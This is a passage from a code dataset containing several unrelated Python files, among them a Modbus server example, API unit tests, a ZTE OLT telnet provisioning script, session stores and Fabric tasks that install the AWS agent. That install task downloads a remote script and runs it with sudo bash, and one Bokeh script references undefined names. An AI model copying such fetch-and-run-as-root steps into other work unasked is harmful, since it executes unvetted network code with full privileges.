","sub_path":"chapter-5/load_img.py","file_name":"load_img.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"242826204","text":"#!/usr/bin/env python3\n# pylint: disable=missing-type-doc,missing-param-doc,differing-param-doc\n\"\"\"Pymodbus Server With Callbacks.\n\nThis is an example of adding callbacks to a running modbus server\nwhen a value is written to it. In order for this to work, it needs\na device-mapping file.\n\"\"\"\nimport logging\nfrom multiprocessing import Queue\nfrom threading import Thread\n\n# --------------------------------------------------------------------------- #\n# import the modbus libraries we need\n# --------------------------------------------------------------------------- #\nfrom pymodbus import __version__ as pymodbus_version\nfrom pymodbus.datastore import (\n ModbusServerContext,\n ModbusSlaveContext,\n ModbusSparseDataBlock,\n)\nfrom pymodbus.device import ModbusDeviceIdentification\nfrom pymodbus.server import StartTcpServer\n\n\n# from pymodbus.transaction import ModbusRtuFramer, ModbusAsciiFramer\n\n\n# --------------------------------------------------------------------------- #\n# configure the service logging\n# --------------------------------------------------------------------------- #\nlog = logging.getLogger()\nlog.setLevel(logging.DEBUG)\n\n# --------------------------------------------------------------------------- #\n# create your custom data block with callbacks\n# --------------------------------------------------------------------------- #\n\n\nclass CallbackDataBlock(ModbusSparseDataBlock):\n \"\"\"A datablock that stores the new value in memory,\n\n and passes the operation to a message queue for further processing.\n \"\"\"\n\n def __init__(self, devices, queue):\n \"\"\"Initialize.\"\"\"\n self.devices = devices\n self.queue = queue\n\n values = {k: 0 for k in devices.keys()}\n values[0xBEEF] = len(values) # the number of devices\n super().__init__(values)\n\n def setValues(self, address, value): # pylint: disable=arguments-differ\n \"\"\"Set the requested values of the datastore\n\n :param address: The starting address\n :param values: The new values to be set\n \"\"\"\n super().setValues(address, value)\n self.queue.put((self.devices.get(address, None), value))\n\n\n# --------------------------------------------------------------------------- #\n# define your callback process\n# --------------------------------------------------------------------------- #\n\n\ndef rescale_value(value):\n \"\"\"Rescale the input value from the range of 0..100 to -3200..3200.\n\n :param value: The input value to scale\n :returns: The rescaled value\n \"\"\"\n scale = 1 if value >= 50 else -1\n cur = value if value < 50 else (value - 50)\n return scale * (cur * 64)\n\n\ndef device_writer(queue):\n \"\"\"Process new messages from a queue to write to device outputs\n\n :param queue: The queue to get new messages from\n \"\"\"\n while True:\n device, value = queue.get()\n rescale_value(value[0])\n txt = f\"Write({device}) = {value}\"\n log.debug(txt)\n if not device:\n continue\n # do any logic here to update your devices\n\n\n# --------------------------------------------------------------------------- #\n# initialize your device map\n# --------------------------------------------------------------------------- #\n\n\ndef read_device_map(path):\n \"\"\"Read the device path to address mapping from file::\n\n 0x0001,/dev/device1\n 0x0002,/dev/device2\n\n :param path: The path to the input file\n :returns: The input mapping file\n \"\"\"\n devices = {}\n with open(path, \"r\") as stream: # pylint: disable=unspecified-encoding\n for line in stream:\n piece = line.strip().split(\",\")\n devices[int(piece[0], 16)] = piece[1]\n return devices\n\n\ndef run_callback_server():\n \"\"\"Run callback server.\"\"\"\n # ----------------------------------------------------------------------- #\n # initialize your data store\n # ----------------------------------------------------------------------- #\n queue = Queue()\n devices = read_device_map(\"device-mapping\")\n block = CallbackDataBlock(devices, queue)\n store = ModbusSlaveContext(di=block, co=block, hr=block, ir=block)\n context = ModbusServerContext(slaves=store, single=True)\n\n # ----------------------------------------------------------------------- #\n # initialize the server information\n # ----------------------------------------------------------------------- #\n identity = ModbusDeviceIdentification(\n info_name={\n \"VendorName\": \"pymodbus\",\n \"ProductCode\": \"PM\",\n \"VendorUrl\": \"https://github.com/pymodbus-dev/pymodbus/\",\n \"ProductName\": \"pymodbus Server\",\n \"ModelName\": \"pymodbus Server\",\n \"MajorMinorRevision\": pymodbus_version,\n }\n )\n\n # ----------------------------------------------------------------------- #\n # run the server you want\n # ----------------------------------------------------------------------- #\n thread = Thread(target=device_writer, args=(queue,))\n thread.start()\n StartTcpServer(context, identity=identity, address=(\"localhost\", 5020))\n\n\nif __name__ == \"__main__\":\n run_callback_server()\n","sub_path":"examples/v2.5.3/callback_server.py","file_name":"callback_server.py","file_ext":"py","file_size_in_byte":5173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"511896748","text":"# Copyright 2017 Catalyst IT Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom datetime import datetime\nimport json\nimport tempfile\n\nimport mock\n\nfrom qinling import status\nfrom qinling.tests.unit.api import base\nfrom qinling.tests.unit import base as unit_base\n\nTEST_CASE_NAME = 'TestFunctionController'\n\n\nclass TestFunctionController(base.APITest):\n def setUp(self):\n super(TestFunctionController, self).setUp()\n\n # Insert a runtime record in db for each test case. The data will be\n # removed automatically in tear down.\n db_runtime = self.create_runtime(prefix=TEST_CASE_NAME)\n self.runtime_id = db_runtime.id\n\n @mock.patch('qinling.storage.file_system.FileSystemStorage.store')\n def test_post(self, mock_store):\n with tempfile.NamedTemporaryFile() as f:\n body = {\n 'name': self.rand_name('function', prefix=TEST_CASE_NAME),\n 'code': json.dumps({\"source\": \"package\"}),\n 'runtime_id': self.runtime_id,\n }\n resp = self.app.post(\n '/v1/functions',\n params=body,\n upload_files=[('package', f.name, f.read())]\n )\n\n self.assertEqual(201, resp.status_int)\n self.assertEqual(1, mock_store.call_count)\n\n body.update({'entry': 'main.main', 'code': {\"source\": \"package\"}})\n self._assertDictContainsSubset(resp.json, body)\n\n def test_get(self):\n db_func = self.create_function(\n runtime_id=self.runtime_id, prefix=TEST_CASE_NAME\n )\n expected = {\n 'id': db_func.id,\n \"code\": {\"source\": \"package\"},\n \"name\": db_func.name,\n 'entry': 'main.main',\n \"project_id\": unit_base.DEFAULT_PROJECT_ID,\n }\n\n resp = self.app.get('/v1/functions/%s' % db_func.id)\n\n self.assertEqual(200, resp.status_int)\n self._assertDictContainsSubset(resp.json, expected)\n\n def test_get_all(self):\n db_func = self.create_function(\n runtime_id=self.runtime_id, prefix=TEST_CASE_NAME\n )\n expected = {\n 'id': db_func.id,\n \"code\": json.dumps({\"source\": \"package\"}),\n \"name\": db_func.name,\n 'entry': 'main.main',\n \"project_id\": unit_base.DEFAULT_PROJECT_ID,\n }\n\n resp = self.app.get('/v1/functions')\n\n self.assertEqual(200, resp.status_int)\n actual = self._assert_single_item(\n resp.json['functions'], id=db_func.id\n )\n self._assertDictContainsSubset(actual, expected)\n\n def test_put_name(self):\n db_func = self.create_function(\n runtime_id=self.runtime_id, prefix=TEST_CASE_NAME\n )\n\n resp = self.app.put_json(\n '/v1/functions/%s' % db_func.id, {'name': 'new_name'}\n )\n\n self.assertEqual(200, resp.status_int)\n self.assertEqual('new_name', resp.json['name'])\n\n @mock.patch('qinling.storage.file_system.FileSystemStorage.store')\n @mock.patch('qinling.rpc.EngineClient.delete_function')\n def test_put_package(self, mock_delete_func, mock_store):\n db_func = self.create_function(\n runtime_id=self.runtime_id, prefix=TEST_CASE_NAME\n )\n\n with tempfile.NamedTemporaryFile() as f:\n resp = self.app.put(\n '/v1/functions/%s' % db_func.id,\n params={},\n upload_files=[('package', f.name, f.read())]\n )\n\n self.assertEqual(200, resp.status_int)\n self.assertEqual(1, mock_store.call_count)\n mock_delete_func.assert_called_once_with(db_func.id)\n\n @mock.patch('qinling.rpc.EngineClient.delete_function')\n @mock.patch('qinling.storage.file_system.FileSystemStorage.delete')\n def test_delete(self, mock_delete, mock_delete_func):\n db_func = self.create_function(\n runtime_id=self.runtime_id, prefix=TEST_CASE_NAME\n )\n resp = self.app.delete('/v1/functions/%s' % db_func.id)\n\n self.assertEqual(204, resp.status_int)\n mock_delete.assert_called_once_with(\n unit_base.DEFAULT_PROJECT_ID, db_func.id\n )\n mock_delete_func.assert_called_once_with(db_func.id)\n\n def test_delete_with_running_job(self):\n db_func = self.create_function(\n runtime_id=self.runtime_id, prefix=TEST_CASE_NAME\n )\n self.create_job(\n function_id=db_func.id,\n prefix=TEST_CASE_NAME,\n status=status.AVAILABLE,\n first_execution_time=datetime.utcnow(),\n next_execution_time=datetime.utcnow(),\n count=1\n )\n\n resp = self.app.delete(\n '/v1/functions/%s' % db_func.id,\n expect_errors=True\n )\n\n self.assertEqual(403, resp.status_int)\n","sub_path":"qinling/tests/unit/api/controllers/v1/test_function.py","file_name":"test_function.py","file_ext":"py","file_size_in_byte":5366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"447866818","text":"import re\nfrom typing import Optional\n\nfrom djing.lib import process_lock\nfrom . import base\n\n\ndef get_onu_template(vlan_id: int, mac_addr: str):\n template = (\n 'switchport mode hybrid vport 1',\n 'service-port 1 vport 1 user-vlan %d vlan %d' % (vlan_id, vlan_id),\n 'port-location format flexible-syntax vport 1',\n 'port-location sub-option remote-id enable vport 1',\n 'port-location sub-option remote-id name %s vport 1' % mac_addr,\n 'dhcp-option82 enable vport 1',\n 'dhcp-option82 trust true replace vport 1',\n 'ip dhcp snooping enable vport 1',\n 'ip-service ip-source-guard enable sport 1'\n )\n return template\n\n\ndef appy_config(onu_mac: str, sn: str, hostname: str, login: str, password: str, prompt: str, vlan: int):\n onu_type = 'ZTE-F660'\n\n # Входим\n ch = base.MySpawn('telnet %s' % hostname)\n ch.timeout = 15\n ch.expect_exact('Username:')\n ch.do_cmd(login, 'Password:')\n\n choice = ch.do_cmd(password, ['bad password.', '%s#' % prompt])\n if choice == 0:\n raise base.ZteOltLoginFailed\n\n ch.do_cmd('terminal length 0', '%s#' % prompt)\n choice = ch.do_cmd('show gpon onu uncfg', ['No related information to show', '%s#' % prompt])\n if choice == 0:\n ch.close()\n raise base.OnuZteRegisterError('unregistered onu not found, sn=%s' % sn)\n elif choice == 1:\n # Получим незареганные onu\n unregistered_onu = base.get_unregistered_onu(\n lines=ch.get_lines_before(),\n serial=sn\n )\n if unregistered_onu is None:\n ch.close()\n raise base.OnuZteRegisterError('unregistered onu not found, sn=%s' % sn)\n stack_num = int(unregistered_onu.get('stack_num'))\n rack_num = int(unregistered_onu.get('rack_num'))\n fiber_num = int(unregistered_onu.get('fiber_num'))\n\n # Получим последнюю зарегистрированную onu\n ch.do_cmd('show run int gpon-olt_%(stack)s/%(rack)s/%(fiber)s' % {\n 'stack': stack_num,\n 'rack': rack_num,\n 'fiber': fiber_num\n }, '%s#' % prompt)\n free_onu_number = base.get_free_registered_onu_number(\n ch.get_lines_before()\n )\n if free_onu_number > 126:\n ch.close()\n raise base.ZTEFiberIsFull('olt fiber %d is full' % fiber_num)\n\n # enter to config\n ch.do_cmd('conf t', '%s(config)#' % prompt)\n int_addr = '%d/%d/%d' % (\n stack_num,\n rack_num,\n fiber_num\n )\n\n # go to olt interface\n ch.do_cmd('interface gpon-olt_%s' % int_addr, '%s(config-if)#' % prompt)\n\n # register onu on olt interface\n ch.do_cmd('onu %d type %s sn %s' % (\n free_onu_number,\n onu_type,\n sn\n ), '%s(config-if)#' % prompt)\n # register onu profile on olt interface\n ch.do_cmd(\n 'onu %d profile line ZTE-F660-LINE remote ZTE-F660-ROUTER' % free_onu_number,\n '%s(config-if)#' % prompt\n )\n\n # Exit from int olt\n ch.do_cmd('exit', '%s(config)#' % prompt)\n\n # Enter to int onu\n ch.do_cmd('int gpon-onu_%(int_addr)s:%(onu_num)d' % {\n 'int_addr': int_addr,\n 'onu_num': free_onu_number\n }, '%s(config-if)#' % prompt)\n\n # Apply int onu config\n template = get_onu_template(vlan, onu_mac)\n for line in template:\n ch.do_cmd(line, '%s(config-if)#' % prompt)\n\n # Exit\n ch.do_cmd('exit', '%s(config)#' % prompt)\n ch.do_cmd('exit', '%s#' % prompt)\n ch.close()\n return base.onu_conv(\n rack_num=rack_num,\n fiber_num=fiber_num,\n port_num=free_onu_number\n )\n else:\n ch.close()\n raise base.ZteOltConsoleError(\"I don't know what choice:\", choice)\n\n\n# Main Entry point\n@process_lock\ndef register_onu(onu_mac: Optional[str], serial: str, zte_ip_addr: str, telnet_login: str,\n telnet_passw: str, telnet_prompt: str, onu_vlan: int):\n\n if not re.match(r'^ZTEG[0-9A-F]{8}$', serial):\n raise base.ExpectValidationError('Serial not valid, match: ^ZTEG[0-9A-F]{8}$')\n\n if not isinstance(onu_vlan, int):\n onu_vlan = int(onu_vlan)\n\n if onu_mac is None:\n onu_mac = base.sn_to_mac(serial)\n\n IP4_ADDR_REGEX = (\n r'^(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.'\n r'(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.'\n r'(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.'\n r'(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$'\n )\n if not re.match(IP4_ADDR_REGEX, zte_ip_addr):\n raise base.ExpectValidationError('ip address for zte not valid')\n\n return appy_config(onu_mac, serial, zte_ip_addr, telnet_login,\n telnet_passw, telnet_prompt, onu_vlan)\n","sub_path":"devapp/expect_scripts/f660.py","file_name":"f660.py","file_ext":"py","file_size_in_byte":4885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"474650356","text":"import argparse\nimport logging\nimport pandas\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch.helpers import bulk\nimport os.path\nimport json\nimport gzip\nimport re\nimport datetime\nimport calendar\n\nmonths = [x.lower() for x in list(calendar.month_name)]\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n \n parser.add_argument(\"-i\", \"--input\", dest=\"input\", action=\"append\", nargs=2, help=\"Excel inputs of form -i FILE_NAME SHEET_NAME\")\n parser.add_argument(\"-o\", \"--output\", dest=\"output\")\n parser.add_argument(\"-H\", \"--host\", dest=\"host\", default=\"localhost\", help=\"Host\")\n parser.add_argument(\"-p\", \"--port\", dest=\"port\", type=int, default=9200, help=\"Port\")\n parser.add_argument(\"-I\", \"--index_name\", dest=\"index_name\", default=\"original_slavery\", help=\"Index name\")\n parser.add_argument(dest=\"inputs\", nargs=\"+\")\n args = parser.parse_args()\n\n logging.basicConfig(level=logging.INFO)\n\n # inputs = {}\n # for fname, sname in args.input:\n # inputs[fname] = inputs.get(fname, []) + [sname]\n\n fields = set()\n actions = []\n #for fname, snames in inputs.items():\n for fname in args.inputs:\n logging.info(\"Reading file '%s'\", fname)\n sheets = pandas.read_excel(fname, sheet_name=None)\n for sname in [s for s in sheets.keys() if not s.startswith(\"DPCache\")]:\n logging.info(\"Processing sheet '%s'\", sname)\n sheet = sheets[sname]\n for field in sheet.iloc[0].to_dict().keys():\n if not field.startswith(\"Unnamed\"):\n fields.add(field.replace(\".\", \"_\"))\n for i in range(len(sheet)):\n item = {k.replace(\".\", \"_\") : str(v) for k, v in sheet.iloc[i].to_dict().items() if not k.startswith(\"Unnamed\")}\n item[\"source_file\"] = os.path.basename(fname)\n item[\"source_sheet\"] = sname\n item[\"source_row\"] = i + 2\n actions.append({\"_source\" : item, \"_index\" : args.index_name})\n properties = {f : {\"type\" : \"text\"} for f in fields}\n properties[\"source_file\"] = {\"type\" : \"keyword\"}\n properties[\"source_sheet\"] = {\"type\" : \"keyword\"}\n properties[\"source_row\"] = {\"type\" : \"integer\"}\n\n dates = [\"notice_event\", \"notice\", \"voyage_arrival\", \"voyage_departure\", \"voyage_manifest\"]\n numeric = [\"slave_age\", \"vessel_tonnage\", \"notice_reward_amount\", \"voyage_count\", \"notice_party_size\", \"owner_count\"]\n coll_locs = [\"owner_location\", \"owner_state\", \"owner_county\", \"owner_city\", \"owner_country\"]\n remove = [\"voyage_port_2\"]\n \n if args.output:\n with gzip.open(args.output, \"wt\") as ofd:\n for a in actions:\n src = a[\"_source\"]\n for k in list(src.keys()):\n v = str(src[k])\n if re.match(\"^\\s*not\", v) or re.match(\"^\\s*\\?\\s*$\", v) or v == \"nan\":\n del src[k]\n else:\n src[k] = v.replace(\"?\", \"\").strip()\n for nf in numeric:\n if nf in src:\n try:\n src[nf] = float(src[nf])\n except:\n del src[nf]\n \n if any([l in src for l in coll_locs]):\n vals = []\n for k in coll_locs:\n if k in src:\n vals.append(src[k])\n del src[k]\n src[\"owner_location\"] = \" \".join(vals)\n for d in dates:\n df = \"{}_day\".format(d)\n ddf = \"{}_date\".format(d)\n mf = \"{}_month\".format(d)\n yf = \"{}_year\".format(d)\n if ddf in src:\n toks = src[ddf].split()\n #del src[ddf]\n if len(toks) == 3:\n day, month, year = toks\n day = int(day)\n if day > 31:\n day = 28\n month = src[mf]\n year = int(float(src[yf]))\n #try:\n src[ddf] = datetime.date(year, months.index(month.lower()), day).toordinal()\n elif len(toks) == 2:\n month, year = toks\n day = 1\n try:\n year = int(float(year))\n src[ddf] = datetime.date(year, months.index(month.lower()), day).toordinal()\n except:\n if ddf in src:\n del src[ddf] \n #except:\n # print(src)\n\n elif all([x in src for x in [df, mf, yf]]):\n try:\n day = int(float(src[df]))\n month = src[mf]\n year = int(float(src[yf]))\n date = \"{} {} {}\".format(year, month, day)\n src[ddf] = datetime.date(year, months.index(month.lower()), day).toordinal()\n #src[ddf] = src.get(ddf, date)\n except:\n if ddf in src:\n del src[ddf]\n elif ddf in src:\n del src[ddf] \n for f in [df, mf, yf] + remove:\n if f in src:\n del src[f]\n \n for pt in [\"author\", \"slave\", \"owner\", \"shipper\", \"captain\", \"consignor\"]:\n s = \"{}_sex\".format(pt)\n if s in src: \n src[s] = src[s].lower()\n if src[s] not in [\"m\", \"f\"]:\n del src[s]\n #print(src[s])\n #print(src)\n \n fn = \"{}_first_name\".format(pt)\n ln = \"{}_last_name\".format(pt)\n if ln in src or fn in src:\n parts = ([src[fn]] if fn in src else []) + ([src[ln]] if ln in src else [])\n src[\"{}_name\".format(pt)] = \" \".join(parts)\n if ln in src:\n del src[ln]\n if fn in src:\n del src[fn]\n \n oc = \"{}_owner_count\".format(pt)\n if oc in src:\n try:\n src[oc] = float(src[oc])\n except:\n del src[oc]\n \n hf = \"{}_height_feet\".format(pt)\n hi = \"{}_height_inches\".format(pt)\n if hf in src:\n\n feet = float(src[hf])\n if hi in src:\n inches = float(src[hi])\n else:\n inches = 0.0\n src[\"{}_height\".format(pt)] = feet + (inches / 12.0)\n del src[hf]\n if hi in src:\n del src[hi]\n src[\"source_row\"] = int(src[\"source_row\"])\n ofd.write(json.dumps(src) + \"\\n\")\n else:\n es = Elasticsearch([{\"host\" : args.host, \"port\" : args.port}])\n if es.indices.exists(args.index_name):\n es.indices.delete(index=args.index_name) \n\n es.indices.create(index=args.index_name, body={\"mappings\" : {\"properties\" : properties}})\n es.indices.put_settings(index=args.index_name, body={\"index\" : { \"max_result_window\" : 500000 }})\n\n bulk(index=args.index_name, actions=actions, raise_on_error=True, client=es)\n","sub_path":"src/load_from_excel.py","file_name":"load_from_excel.py","file_ext":"py","file_size_in_byte":8090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"584714193","text":"\"\"\"\n=======================\nMaxime RDF Calculations\n=======================\n\"\"\"\n\nimport os\nimport sys\nimport pandas as pd\nfrom bokeh.palettes import Category20\nfrom bokeh.models import Select\nfrom bokeh.layouts import row, widgetbox\nfrom bokeh.plotting import curdoc, figure\n# Add the parent path so that bokeh --serve can see the `vis`\n# module and import it.\nsys.path.insert(\n 0,\n os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\nfrom vis.utils import read_rdf\n\n# Read the desired metadata file:\n# This returns a list of dataframes.\ndata_frames = read_rdf('metadata.json', char_types=['Aluminate Species'])\n\n# Define colors and sizes to be used later.\nSIZES = list(range(6, 22, 3))\nCOLORS = Category20[20]\n\n# Data wrangling.\nysl = [df['RDF_Al-Ob'] for df in dataframes]\nxsl = [df['r'] for df in dataframes]\n\ndef create_figure():\n\n # Assign the x and y values to those selected.\n xs = df[x_sel.value].values\n ys = df[y_sel.value].values\n\n # Get the titles from those selected.\n x_title = x_sel.value.title()\n y_title = y_sel.value.title()\n\n # Create a dictionary to pass to the bokeh plot.\n kw = dict()\n\n # Check if the x and y axis values are discrete.\n # if so use the low level dict key word to set the range appropriately.\n if x_sel.value in discrete:\n kw['x_range'] = sorted(set(xs))\n if y_sel.value in discrete:\n kw['y_range'] = sorted(set(ys))\n\n # Set a default size for the points\n # sz = 9\n # if size.value != 'None':\n # if size.value in discrete:\n # sz = [SIZES[xx] for xx in df[size.value].factorize()[0]]\n # else:\n # groups = pd.qcut(df[size.value].values, len(SIZES), duplicates='drop')\n # sz = [SIZES[xx] for xx in groups.codes]\n # Set the default color\n c = '#31AADE'\n if color.value != 'None':\n if color.value in discrete:\n c = [COLORS[xx] for xx in df[color.value].factorize()[0]]\n else:\n groups = pd.qcut(\n df[color.value].values, len(SIZES), duplicates='drop')\n c = [COLORS[xx] for xx in groups.codes]\n # Assign the titles.\n fig = figure(\n plot_height=600,\n plot_width=800,\n tools='pan,box_zoom,reset',\n **kw,\n )\n fig.xaxis.axis_label = x_title\n fig.yaxis.axis_label = y_title\n fig.circle(\n x=xs,\n y=ys,\n color=c,\n # size=sz,\n line_color=None,\n alpha=0.7,\n hover_color='white',\n hover_alpha=0.5,\n )\n\n return fig\n\n\ndef update(attr, old, new):\n layout.children[1] = create_figure()\n return\n\n\n# Create the inputs\nx_sel = Select(\n title='X-Axis',\n value='r',\n options=columns)\nx_sel.on_change('value', update)\n\ny_sel = Select(\n title='Y-Axis',\n value='inter atom distance',\n options=columns)\ny_sel.on_change('value', update)\n\n# Create the color input.\ncolor = Select(\n title='Color',\n value='None',\n options=['None'] + discrete + quantileable)\ncolor.on_change('value', update)\n\n# Create the size input\n# size = Select(title='Size', value='None', options=['None'] + quantileable)\n# size.on_change('value', update)\n\n# Create a list of the controls\ncontrols = widgetbox([x_sel, y_sel, color], width=200)\n\n# Create the layout\nlayout = row(controls, create_figure())\n\n# Add to the current doc.\ncurdoc().add_root(layout)\ncurdoc().title = \"Maxime RDF\"\n","sub_path":"vis/maxime_rdf_vis.py","file_name":"maxime_rdf_vis.py","file_ext":"py","file_size_in_byte":3400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"530463795","text":"# Client TCP\nimport socket\nimport ssl\nimport sys\n\n# Initiate global variables\ngameLoop = False\nguess = \"\"\nassessment = \"\"\n\n# Create client socket\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n # SSL\n#ts = ssl.wrap_socket(s, certfile=\"100352212.crt\", keyfile=\"100352212.key\", ca_certs=\"5cc515-root-ca.cer\")\n\n# Connect socket to server\n\ns.connect((\"127.0.0.1\", 4000))\n \n\n# Greetings Exchange\ns.sendall(\"Hello\\r\\n\".encode())\n\n# Salutations upon greetings recieval\nif(s.recv(10000).decode() == \"Greetings\\r\\n\"):\n print(\"Welcome to the guess the number game! \")\n\n \n# Game Loop\nwhile (gameLoop != True):\n # Input and send guess\n try:\n guess = int(input(\"What is your guess? \"))\n except ValueError:\n print(\"That was not a valid guess. Try again...\")\n continue\n intGuess = (\"Guess: %i\\r\\n\" % (guess))\n try:\n s.sendall(intGuess.encode())\n # Assess result\n assessment = (s.recv(10000).decode())\n except:\n print(\"Cannot connect to server, closing the program.\")\n sys.exit()\n \n if(assessment == \"Correct\\r\\n\"):\n print(\"You guessed correctly!\")\n gameLoop = True\n elif(assessment == \"Close\\r\\n\"):\n print(\"You are getting close!\")\n elif(assessment == \"Far\\r\\n\"):\n print(\"You are way off.\")\n \n \ns.close() \n","sub_path":"pclient.py","file_name":"pclient.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"135129894","text":"import boto3\nfrom fabric.api import env, sudo, run, task\nfrom fabric.colors import green\n\n\n@task\ndef status():\n print(green('AWS Agent status for {host}'.format(**env)))\n sudo('/opt/aws/awsagent/bin/awsagent status')\n\n\n@task\ndef install():\n print(green('Downloading AWS Agent installation script'))\n run('curl -O https://d1wk0tztpsntt1.cloudfront.net/linux/latest/install')\n\n print(green('Installing AWS Agent'))\n run('sudo bash install')\n\n\n@task\ndef validate_install():\n pass\n\n\n@task\ndef start():\n print(green('Starting AWS Agent'))\n sudo('/etc/init.d/awsagent start')\n\n\n@task\ndef stop():\n print(green('Stopping AWS Agent'))\n sudo('/etc/init.d/awsagent stop')\n\n\n@task\ndef get_cluster_instances(cluster=None):\n if cluster is None:\n print('No cluster specified')\n return\n client = boto3.client('ecs')\n response = client.list_container_instances(cluster=cluster)\n print(response)\n","sub_path":"awsagent.py","file_name":"awsagent.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"91325611","text":"def is_square(xss):\n\tif xss== []:\n\t\treturn True\n\tlen_xss= len(xss)\n\tlen_xss_0=len(xss[0])\n\tfor x in xss:\n\t if (len(x) != len_xss) or (len(x)!= len_xss_0):\n\t pass \n\t return False\n\treturn True\n\ndef diagonal_vals(xss):\n new_list=[]\n if is_square(xss) == True:\n if xss== []:\n return new_list\n for i in range(len(xss[0])):\n\t for row in xss:\n\t new_list.append(row[i])\n\t i+=1\n\t break\t\t\n return new_list\n return None\n\n\n\n# diagonal_vals(xss): Given a list of lists of values xss, if the structure in the \n# diagonal from top-left to bottom-right as a list. If it's not square,\n# • assume: xss is a list of lists of any Python values.\n# • diagonal_vals ( [[1,2,3], [4,5,6], [7,8,9]] )\n# • diagonal_vals ( [[1,2,3], [4,5]] )\n# • diagonal_vals ( [['a','b'], ['c','d']] )\n# • diagonal_vals([])\n# → → → →","sub_path":"CS112/Project 5/diagonal_vals.py","file_name":"diagonal_vals.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"397330024","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom pathlib import Path\nfrom setuptools import setup\n\nversion = \"1.4.1\"\n\n# read the contents of your README file\n\nlong_description = (Path(__file__).parent / \"README.md\").read_text()\n\nsetup(\n name=\"structlog-sentry\",\n version=\"1.4.1\",\n description=\"Sentry integration for structlog\",\n author=\"Kiwi.com platform\",\n author_email=\"platform@kiwi.com\",\n packages=[\"structlog_sentry\"],\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n license=\"MIT\",\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"281319363","text":"# -*- coding: utf-8 -*-\n__all__ = ['BDBSessionStore', 'FilesystemSessionStore', 'MemorySessionStore',\n 'dummy_session']\nimport os\ntry:\n from cPickle import dumps, loads, HIGHEST_PROTOCOL\nexcept ImportError:\n from pickle import dumps, loads, HIGHEST_PROTOCOL\nfrom werkzeug.contrib.sessions import FilesystemSessionStore, SessionStore, \\\n Session\n\n\nclass DummySession(object):\n should_save = False\ndummy_session = DummySession()\n\n\nclass FilesystemLevelSessionStore(FilesystemSessionStore):\n def __init__(self, path=None, level=1):\n self.level = level\n s = '%s/' * level\n FilesystemSessionStore.__init__(self, path,\n filename_template=s+'werkzeug_%s.sess')\n\n def get_session_filename(self, sid):\n args = []\n for i in range(self.level):\n args.append(sid[i])\n args.append(sid)\n return os.path.join(self.path, self.filename_template % tuple(args))\n\n\nclass BDBSessionStore(SessionStore):\n def __init__(self, file_path=None, session_class=Session):\n import bsddb\n SessionStore.__init__(self, session_class)\n if file_path is None:\n from tempfile import gettempdir\n file_path = os.path.join(gettempdir(), 'session.bdb')\n self.db = bsddb.hashopen(file_path)\n\n def save(self, session):\n self.db[str(session.sid)] = dumps(dict(session), HIGHEST_PROTOCOL)\n self.db.sync()\n\n def delete(self, session):\n try:\n del self.db[str(session.sid)]\n except KeyError:\n pass\n else:\n self.db.sync()\n\n def get(self, sid):\n session = self.db.get(str(sid))\n if not session:\n session = self.new()\n else:\n session = self.session_class(loads(session), sid, False)\n return session\n\n\nclass MemorySessionStore(SessionStore):\n def __init__(self, session_class=Session):\n SessionStore.__init__(self, session_class)\n self.db = {}\n\n def save(self, session):\n self.db[session.sid] = session\n\n def delete(self, session):\n self.db.pop(session.sid, None)\n\n def get(self, sid):\n try:\n return self.db[sid]\n except KeyError:\n return self.new()\n\n\nclass MemcachedSessionStore(SessionStore):\n def __init__(self, servers, session_class=Session):\n SessionStore.__init__(self, session_class)\n import memcache\n self.client = memcache.Client(servers)\n\n def save(self, session):\n s = dumps(dict(session), HIGHEST_PROTOCOL)\n self.client.set(str(session.sid), s)\n\n def delete(self, session):\n self.client.delete(str(session.sid))\n\n def get(self, sid):\n session = self.client.get(str(sid))\n if session is None:\n session = self.new()\n else:\n session = self.session_class(loads(session), sid, False)\n return session\n\n\nclass GAESessionStore(SessionStore):\n def __init__(self, session_class=Session):\n SessionStore.__init__(self, session_class)\n from google.appengine.api import memcache\n self.client = memcache\n","sub_path":"branches/67/accost/sessions.py","file_name":"sessions.py","file_ext":"py","file_size_in_byte":3132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"216139058","text":"import os\nos.environ['KERAS_BACKEND'] = 'tensorflow'\nos.environ['CUDA_VISIBLE_DEVICES'] = '2'\nimport tensorflow as tf\ngpu_options = 